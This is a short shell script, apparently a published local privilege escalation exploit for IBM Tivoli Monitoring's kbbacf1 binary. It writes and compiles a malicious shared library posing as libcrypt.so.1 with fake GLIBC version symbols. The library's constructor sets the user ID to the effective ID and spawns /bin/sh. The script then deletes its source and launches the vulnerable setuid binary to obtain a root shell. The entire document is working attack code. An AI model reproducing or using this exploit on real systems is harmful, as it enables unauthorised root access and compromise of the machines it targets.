#!/bin/sh
echo
"[+] Tivoli pwner kbbacf1 privilege escalation exploit by Robert Jaroszuk"
echo
"[+] Preparing the code..."
cat
> kbbacf1-pwn.c << DONE
void __cxa_finalize (void *d) {
return
;
}
void __attribute__((constructor)) init() {
setresuid(geteuid(), geteuid(), geteuid());
execl(
"/bin/sh"
, (char *)NULL, (char *)NULL);
}
DONE
cat
> version << DONE
GLIBC_2.2.5 { };
GLIBC_2.3 { };
GLIBC_2.3.2 { };
GLIBC_PRIVATE { };
DONE
echo
"[+] Preparing the code... part2"
/usr/bin/gcc
-Wall -fPIC -shared -static-libgcc -Wl,--version-script=version -o libcrypt.so.1 kbbacf1-pwn.c
echo
"[+] Cleaning up..."
/bin/rm
-f kbbacf1-pwn.c version
echo
"[+] Exploiting."
/opt/IBM/ITM/tmaitm6/lx8266/bin/kbbacf1